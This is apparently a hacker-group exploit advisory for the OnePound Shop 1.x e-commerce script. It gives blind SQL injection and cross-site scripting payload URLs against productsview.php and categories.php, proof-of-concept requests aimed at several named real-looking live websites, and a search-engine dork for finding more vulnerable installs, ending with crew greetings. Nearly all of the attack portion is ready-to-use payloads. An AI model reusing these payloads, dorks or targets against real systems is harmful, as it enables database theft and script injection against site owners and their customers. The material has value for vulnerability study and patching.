================================================================================================


  [o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability

       Software : OnePound Shop version 1.x
       Vendor   : http://www.onepound.cn/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


================================================================================================


  [o] Vulnerable file

       productsview.php
       categories.php



  [o] Exploit

       http://localhost/[path]/productsview.php?id=xx&proid=[SQL]
       http://localhost/[path]/categories.php?pid=[XSS]



  [o] Proof of concept

       http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5
       http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4
       http://www.tele-way.com/productsview.php?id=87&proid=<script>alert(1210)</script>
       http://tonysbridal.net/categories.php?pid=<script>alert(1210)</script>
       http://vendorhotspot.com/categories.php?pid=<script>alert(1210)</script>



  [o] Dork

       "Powered by OnePound"


================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/news ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


================================================================================================